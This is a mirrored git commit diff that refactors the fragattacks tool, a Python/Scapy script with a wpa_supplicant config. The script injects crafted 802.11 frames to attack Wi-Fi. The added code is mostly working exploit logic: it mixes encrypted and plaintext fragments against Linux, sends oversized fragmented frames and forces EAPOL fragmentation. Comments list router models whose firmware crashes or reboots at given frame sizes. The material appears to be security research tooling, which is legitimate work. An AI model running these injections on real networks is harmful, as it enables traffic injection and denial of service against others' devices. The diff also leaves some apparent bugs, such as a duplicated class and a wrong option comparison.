mirror of
https://github.com/vanhoefm/fragattacks.git
synced 2025-02-26 13:49:35 -05:00
fragattack: refactored code
This commit is contained in:
parent
20b60570ca
commit
7b0205062e
@ -1,4 +1,4 @@
|
||||
ctrl_interface=wpasupp_ctrl
|
||||
ctrl_interface=wpaspy_ctrl
|
||||
|
||||
network={
|
||||
ssid="testnetwork"
|
||||
@ -10,6 +10,6 @@ network={
|
||||
ssid="mathynet"
|
||||
disable_ht=1
|
||||
|
||||
key_mgmt=NONE
|
||||
#psk="forefoot2020"
|
||||
#key_mgmt=NONE
|
||||
psk="abcdefgh"
|
||||
}
|
||||
|
@ -1,6 +1,6 @@
|
||||
#!/usr/bin/env python3
|
||||
from libwifi import *
|
||||
import sys, socket, struct, time, subprocess, atexit, select
|
||||
import abc, sys, socket, struct, time, subprocess, atexit, select
|
||||
from wpaspy import Ctrl
|
||||
|
||||
# NOTES:
|
||||
@ -11,14 +11,12 @@ from wpaspy import Ctrl
|
||||
# Overwriting the sequence can be avoided by patching `ath_tgt_tx_seqno_normal`
|
||||
# and commenting out the two lines that modify `i_seq`.
|
||||
|
||||
#def main(interface):
|
||||
# conf.iface = interface + "mon"
|
||||
# inject_fragmented()
|
||||
|
||||
#MAC_STA2 = "d0:7e:35:d9:80:91"
|
||||
#MAC_STA2 = "20:16:b9:b2:73:7a"
|
||||
MAC_STA2 = "80:5a:04:d4:54:c4"
|
||||
|
||||
# ---------- Utility Commands ----------
|
||||
|
||||
def wpaspy_clear_messages(ctrl):
|
||||
# Clear old replies and messages from the hostapd control interface
|
||||
while ctrl.pending():
|
||||
@ -35,49 +33,89 @@ def wpaspy_command(ctrl, cmd):
|
||||
quit(1)
|
||||
return rval
|
||||
|
||||
class FragAttack():
|
||||
def __init__(self, interface):
|
||||
self.nic_iface = interface
|
||||
# Note: some kernels don't support long names
|
||||
self.nic_mon = "mon" + interface[:12]
|
||||
class TestOptions():
|
||||
ForceFrag_EAPOL, Inject_LargeFrag, Attack_LinuxInject, Inject_Frag = range(4)
|
||||
|
||||
def __init__(self):
|
||||
self.test = None
|
||||
self.interface = None
|
||||
|
||||
class Station(metaclass=abc.ABCMeta):
|
||||
# - Get an IP address of the other Station
|
||||
# - Connected events
|
||||
# - Getting the PTK
|
||||
# - Frame injection (to-DS field and MAC addresses)
|
||||
|
||||
def __init__(self, options):
|
||||
self.options = options
|
||||
self.nic_iface = options.interface
|
||||
self.clientmac = None
|
||||
|
||||
self.sock = None
|
||||
self.wpasupp = None
|
||||
self.wpasupp_ctrl = None
|
||||
|
||||
self.apmac = None
|
||||
|
||||
# Note: some kernels don't support 15+ character interface names
|
||||
self.nic_mon = "mon" + self.nic_iface[:12]
|
||||
self.sock = None
|
||||
self.daemon = None
|
||||
self.daemon_ctrl = None
|
||||
|
||||
self.tk = None
|
||||
self.pn = 0x99
|
||||
|
||||
def inject_fragments_linux(self):
|
||||
@abc.abstractmethod
|
||||
def start_daemon(self):
|
||||
pass
|
||||
|
||||
@abc.abstractmethod
|
||||
def set_frame_header(self, p):
|
||||
pass
|
||||
|
||||
@abc.abstractmethod
|
||||
def handle_rx(self, p):
|
||||
pass
|
||||
|
||||
@abc.abstractmethod
|
||||
def handle_wpaspy(self, msg):
|
||||
pass
|
||||
|
||||
def get_tk(self):
|
||||
self.tk = wpaspy_command(self.daemon_ctrl, "GET tk")
|
||||
if self.tk == "none":
|
||||
self.tk = None
|
||||
log(STATUS, "No key being used")
|
||||
else:
|
||||
print(self.tk)
|
||||
self.tk = bytes.fromhex(self.tk)
|
||||
log(STATUS, "TK: " + self.tk.hex())
|
||||
|
||||
def fragattack_linux(self):
|
||||
assert self.tk
|
||||
|
||||
payload1 = b"A" * 16
|
||||
payload2 = b"B" * 16
|
||||
payload3 = b"C" * 16
|
||||
seqnum = 0xAA
|
||||
addr3 = MAC_STA2
|
||||
|
||||
# Frame 1: encrypted normal fragment
|
||||
frag1 = Dot11(type="Data", FCfield="to-DS+MF", addr1=self.apmac, addr2=self.clientmac, addr3=addr3, SC=(seqnum << 4) | 0)/Raw(payload1)
|
||||
frag1 = Dot11(type="Data", FCfield="MF", SC=(seqnum << 4) | 0)/Raw(payload1)
|
||||
self.set_frame_header(frag1)
|
||||
frag1 = encrypt_ccmp(frag1, self.tk, self.pn)
|
||||
self.pn += 1
|
||||
|
||||
# Frame 2: encrypted fragment with different CS but incremental PN.
|
||||
# sent fragmented to prevent receiving from processing it.
|
||||
frag2 = Dot11(type="Data", FCfield="to-DS", addr1=self.apmac, addr2=self.clientmac, addr3=addr3, SC=((seqnum ^ 1) << 4) | 1)/Raw(payload2)
|
||||
frag2 = Dot11(type="Data", SC=((seqnum ^ 1) << 4) | 1)/Raw(payload2)
|
||||
self.set_frame_header(frag1)
|
||||
frag2 = encrypt_ccmp(frag2, self.tk, self.pn)
|
||||
self.pn += 1
|
||||
|
||||
# Frame 3: plaintext fragment with same CS as the first encrypted fragment
|
||||
frag3 = Dot11(type="Data", FCfield="to-DS", addr1=self.apmac, addr2=self.clientmac, addr3=addr3, SC=(seqnum << 4) | 1)/Raw(payload3)
|
||||
frag3 = Dot11(type="Data", SC=(seqnum << 4) | 1)/Raw(payload3)
|
||||
self.set_frame_header(frag1)
|
||||
|
||||
sendp(RadioTap()/frag1, iface=self.nic_mon)
|
||||
sendp(RadioTap()/frag2, iface=self.nic_mon)
|
||||
sendp(RadioTap()/frag3, iface=self.nic_mon)
|
||||
|
||||
|
||||
def send_fragmented(self, header, data, num_frags):
|
||||
fragments = []
|
||||
fragsize = (len(data) + 1) // num_frags
|
||||
@ -99,13 +137,15 @@ class FragAttack():
|
||||
time.sleep(0.2)
|
||||
sendp(fragments, iface=self.nic_mon)
|
||||
|
||||
|
||||
def inject_fragments(self, ping=False):
|
||||
def inject_fragments(self, ping=False, num_frags=3, size=3000):
|
||||
if ping:
|
||||
data = raw(LLC()/SNAP()/IP(dst="192.168.4.100", src="192.168.4.101")/ICMP())
|
||||
# XXX TODO: How to automatically get IPs?
|
||||
data = raw(LLC()/SNAP()/IP(dst="192.168.4.100", src="192.168.4.101")/ICMP()/Raw("A" * size))
|
||||
else:
|
||||
# ========== Tests against APs ==========
|
||||
#
|
||||
# ath9k_htc:
|
||||
# - The WNDA3200 firmware crashes when sending a frame of 2000+ bytes
|
||||
# - The WNDA3200 firmware crashes when sending a frame (as a client) of 2000+ bytes
|
||||
#
|
||||
# Values for WAG320 (Broadcom BCM4322):
|
||||
# - 1900-1988 caused the WAG320N to reboot when it was the first fragmented frame after boot,
|
||||
@ -140,73 +180,24 @@ class FragAttack():
|
||||
# - TODO: Maybe in client mode fragmented frames can cause crashes?
|
||||
#
|
||||
# TODO: Inject a very large (>2346 single-frame Wi-Fi frame)
|
||||
data = b"A" * 3000
|
||||
data = b"A" * size
|
||||
|
||||
seqnum = 0xAA
|
||||
header = Dot11(type="Data", FCfield="to-DS", addr1=self.apmac, addr2=self.clientmac, addr3=MAC_STA2, SC=(seqnum << 4))
|
||||
self.send_fragmented(header, data, num_frags=3)
|
||||
header = Dot11(type="Data", SC=(seqnum << 4))
|
||||
self.set_frame_header(header)
|
||||
self.send_fragmented(header, data, num_frags)
|
||||
|
||||
def inject_eapol(self, numbytes=16):
|
||||
# This test is supposed to be executed before authenticating with the AP
|
||||
assert self.tk == None
|
||||
|
||||
seqnum = 0xAA
|
||||
header = Dot11(type="Data", FCfield="to-DS", addr1=self.apmac, addr2=self.clientmac, addr3=MAC_STA2, SC=(seqnum << 4))
|
||||
header = Dot11(type="Data", SC=(seqnum << 4))
|
||||
self.set_frame_header(header)
|
||||
data = raw(LLC()/SNAP()/EAPOL()/EAP()/Raw(b"A" * 2600))
|
||||
self.send_fragmented(header, data, num_frags=2)
|
||||
|
||||
|
||||
def inject_ping(self, numbytes=16):
|
||||
addr3 = MAC_STA2
|
||||
|
||||
p = Dot11(type="Data", FCfield="to-DS", addr1=self.apmac, addr2=self.clientmac, addr3=addr3)
|
||||
p = p/LLC()/SNAP()/IP(dst="192.168.4.100", src="192.168.4.101")/ICMP()/Raw(b"A" * numbytes)
|
||||
if self.tk:
|
||||
p = encrypt_ccmp(p, self.tk, self.pn)
|
||||
self.pn += 1000
|
||||
|
||||
for i in range(100):
|
||||
sendp(RadioTap()/p, iface=self.nic_mon)
|
||||
|
||||
def handle_rx(self):
|
||||
p = self.sock.recv()
|
||||
if p == None: return
|
||||
|
||||
#self.process_frame(p)
|
||||
|
||||
def get_tk(self):
|
||||
self.tk = wpaspy_command(self.wpasupp_ctrl, "GET tk")
|
||||
if self.tk == "none":
|
||||
self.tk = None
|
||||
log(STATUS, "No key being used")
|
||||
else:
|
||||
print(self.tk)
|
||||
self.tk = bytes.fromhex(self.tk)
|
||||
log(STATUS, "TK: " + self.tk.hex())
|
||||
|
||||
def handle_wpasupp(self):
|
||||
while self.wpasupp_ctrl.pending():
|
||||
msg =self.wpasupp_ctrl.recv()
|
||||
log(STATUS, "wpasupp: " + msg)
|
||||
|
||||
if "Trying to authenticate with" in msg:
|
||||
# Example: "SME: Trying to authenticate with 00:0c:f6:22:d2:11 (SSID='mathynet' freq=2412 MHz)"
|
||||
p = re.compile("Trying to authenticate with (.*) \(SSID")
|
||||
self.apmac = p.search(msg).group(1)
|
||||
|
||||
elif "CTRL-EVENT-CONNECTED" in msg and self.options.test == TestOptions.Inject_LargeFrag:
|
||||
p = re.compile("Connection to (.*) completed")
|
||||
self.apmac = p.search(msg).group(1)
|
||||
self.get_tk()
|
||||
|
||||
time.sleep(1)
|
||||
self.inject_fragments()
|
||||
#self.inject_ping(numbytes=2000)
|
||||
|
||||
elif "EAPOL-TX" in msg and self.options.test == TestOptions.ForceFrag_EAPOL:
|
||||
# XXX - Inject large EAPOL frame through AP to force fragmentation towards STA
|
||||
self.inject_eapol()
|
||||
|
||||
# TODO: Might be good to put this into libwifi?
|
||||
def configure_interfaces(self):
|
||||
log(STATUS, "Note: disable Wi-Fi in your network manager so it doesn't interfere with this script")
|
||||
|
||||
@ -225,65 +216,112 @@ class FragAttack():
|
||||
subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
|
||||
subprocess.check_output(["ifconfig", self.nic_mon, "up"])
|
||||
|
||||
def run(self, options):
|
||||
self.options = options
|
||||
def run(self):
|
||||
self.configure_interfaces()
|
||||
|
||||
self.sock = MonitorSocket(type=ETH_P_ALL, iface=self.nic_mon)
|
||||
|
||||
# Open the patched hostapd instance that carries out tests and let it start
|
||||
log(STATUS, "Starting wpa_supplicant ...")
|
||||
try:
|
||||
self.wpasupp = subprocess.Popen([
|
||||
"../wpa_supplicant/wpa_supplicant",
|
||||
"-Dnl80211",
|
||||
"-i", self.nic_iface,
|
||||
"-cclient.conf"])
|
||||
except:
|
||||
if not os.path.exists("../wpa_supplicant/wpa_supplicant"):
|
||||
log(ERROR, "wpa_supplicant executable not found. Did you compile wpa_supplicant? Use --help param for more info.")
|
||||
raise
|
||||
self.start_daemon()
|
||||
time.sleep(1)
|
||||
|
||||
# Open the wpa_supplicant client that will connect to the network that will be tested
|
||||
|
||||
# Open the wpa_supplicant or hostapd control interface
|
||||
self.clientmac = scapy.arch.get_if_hwaddr(self.nic_iface)
|
||||
try:
|
||||
self.wpasupp_ctrl = Ctrl("wpasupp_ctrl/" + self.nic_iface)
|
||||
self.wpasupp_ctrl.attach()
|
||||
self.daemon_ctrl = Ctrl("wpaspy_ctrl/" + self.nic_iface)
|
||||
self.daemon_ctrl.attach()
|
||||
except:
|
||||
log(ERROR, "It seems wpa_supplicant did not start properly, please inspect its output.")
|
||||
log(ERROR, "Did you disable Wi-Fi in the network manager? Otherwise wpa_supplicant won't work.")
|
||||
log(ERROR, "It seems wpa_supplicant/hostapd did not start properly, please inspect its output.")
|
||||
log(ERROR, "Did you disable Wi-Fi in the network manager? Otherwise it won't start properly.")
|
||||
raise
|
||||
|
||||
# Configure things for the specific test we are running
|
||||
if self.options.test == TestOptions.ForceFrag_EAPOL:
|
||||
# Intercept EAPOL packets that the client wants to send
|
||||
wpaspy_command(self.wpasupp_ctrl, "SET ext_eapol_frame_io 1")
|
||||
wpaspy_command(self.daemon_ctrl, "SET ext_eapol_frame_io 1")
|
||||
|
||||
# Monitor the virtual monitor interface of the client and perform the needed actions
|
||||
while True:
|
||||
sel = select.select([self.sock, self.wpasupp_ctrl.s], [], [], 1)
|
||||
if self.sock in sel[0]: self.handle_rx()
|
||||
if self.wpasupp_ctrl.s in sel[0]: self.handle_wpasupp()
|
||||
sel = select.select([self.sock, self.daemon_ctrl.s], [], [], 1)
|
||||
|
||||
if self.sock in sel[0]:
|
||||
p = self.sock.recv()
|
||||
if p != None: self.handle_rx(p)
|
||||
|
||||
if self.daemon_ctrl.s in sel[0]:
|
||||
# XXX while self.daemon_ctrl.pending():
|
||||
msg = self.daemon_ctrl.recv()
|
||||
self.handle_wpaspy(msg)
|
||||
|
||||
def stop(self):
|
||||
log(STATUS, "Closing wpa_supplicant and cleaning up ...")
|
||||
if self.wpasupp:
|
||||
self.wpasupp.terminate()
|
||||
self.wpasupp.wait()
|
||||
log(STATUS, "Closing Hostap daemon and cleaning up ...")
|
||||
if self.daemon:
|
||||
self.daemon.terminate()
|
||||
self.daemon.wait()
|
||||
if self.sock: self.sock.close()
|
||||
|
||||
|
||||
pass
|
||||
|
||||
|
||||
class Authenticator(Station):
|
||||
pass
|
||||
|
||||
|
||||
class Supplicant(Station):
|
||||
def __init__(self, options):
|
||||
super().__init__(options)
|
||||
|
||||
def handle_rx(self, p):
|
||||
pass
|
||||
|
||||
def set_frame_header(self, p):
|
||||
p.FCfield = Dot11(FCfield="to-DS").FCfield
|
||||
p.addr1 = self.apmac
|
||||
p.addr2 = self.clientmac
|
||||
p.addr3 = MAC_STA2
|
||||
|
||||
def handle_wpaspy(self, msg):
|
||||
log(STATUS, "daemon: " + msg)
|
||||
|
||||
if "Trying to authenticate with" in msg:
|
||||
# Example: "SME: Trying to authenticate with 00:0c:f6:22:d2:11 (SSID='mathynet' freq=2412 MHz)"
|
||||
p = re.compile("Trying to authenticate with (.*) \(SSID")
|
||||
self.apmac = p.search(msg).group(1)
|
||||
|
||||
elif "CTRL-EVENT-CONNECTED" in msg:
|
||||
p = re.compile("Connection to (.*) completed")
|
||||
self.apmac = p.search(msg).group(1)
|
||||
self.get_tk()
|
||||
|
||||
time.sleep(1)
|
||||
|
||||
if self.options.test == TestOptions.Inject_Frag:
|
||||
self.inject_fragments(ping=True, num_frags=1, size=16)
|
||||
elif self.options == TestOptions.Inject_LargeFrag:
|
||||
self.inject_fragments(ping=False, num_frags=3, size=3000)
|
||||
|
||||
elif "EAPOL-TX" in msg and self.options.test == TestOptions.ForceFrag_EAPOL:
|
||||
# XXX - Inject large EAPOL frame through AP to force fragmentation towards STA
|
||||
self.inject_eapol()
|
||||
|
||||
def start_daemon(self):
|
||||
log(STATUS, "Starting wpa_supplicant ...")
|
||||
try:
|
||||
self.daemon = subprocess.Popen([
|
||||
"../wpa_supplicant/wpa_supplicant",
|
||||
"-Dnl80211",
|
||||
"-i", self.nic_iface,
|
||||
"-cclient.conf",
|
||||
"-dd"])
|
||||
except:
|
||||
if not os.path.exists("../wpa_supplicant/wpa_supplicant"):
|
||||
log(ERROR, "wpa_supplicant executable not found. Did you compile wpa_supplicant? Use --help param for more info.")
|
||||
raise
|
||||
|
||||
|
||||
def cleanup():
|
||||
attack.stop()
|
||||
|
||||
|
||||
class TestOptions():
|
||||
ForceFrag_EAPOL, Inject_LargeFrag, Attack_LinuxInject = range(3)
|
||||
|
||||
def __init__(self):
|
||||
self.test = None
|
||||
|
||||
def argv_pop_argument(argument):
|
||||
if not argument in sys.argv: return False
|
||||
idx = sys.argv.index(argument)
|
||||
@ -297,11 +335,12 @@ if __name__ == "__main__":
|
||||
quit(1)
|
||||
|
||||
options = TestOptions()
|
||||
options.interface = sys.argv[1]
|
||||
|
||||
# Parse the type of test variant to execute
|
||||
force_frag = argv_pop_argument("--force-frag")
|
||||
inject_largefrag = argv_pop_argument("--replay-unicast")
|
||||
attack_linux = argv_pop_argument("--group")
|
||||
inject_largefrag = argv_pop_argument("--largefrag")
|
||||
attack_linux = argv_pop_argument("--attack-linux")
|
||||
if force_frag + inject_largefrag + attack_linux > 1:
|
||||
print("You can only select one test")
|
||||
quit(1)
|
||||
@ -312,17 +351,14 @@ if __name__ == "__main__":
|
||||
elif attack_linux:
|
||||
options.test = TestOptions.Attack_LinuxInject
|
||||
else:
|
||||
print("No test option was specified, exiting.")
|
||||
quit(1)
|
||||
options.test = TestOptions.Inject_Frag
|
||||
|
||||
# Parse remaining options
|
||||
while argv_pop_argument("--debug"):
|
||||
libwifi.global_log_level -= 1
|
||||
|
||||
# Now start the tests
|
||||
attack = FragAttack(sys.argv[1])
|
||||
attack = Supplicant(options)
|
||||
atexit.register(cleanup)
|
||||
attack.run(options=options)
|
||||
|
||||
main()
|
||||
attack.run()
|
||||
|
||||
|
Loading…
x
Reference in New Issue
Block a user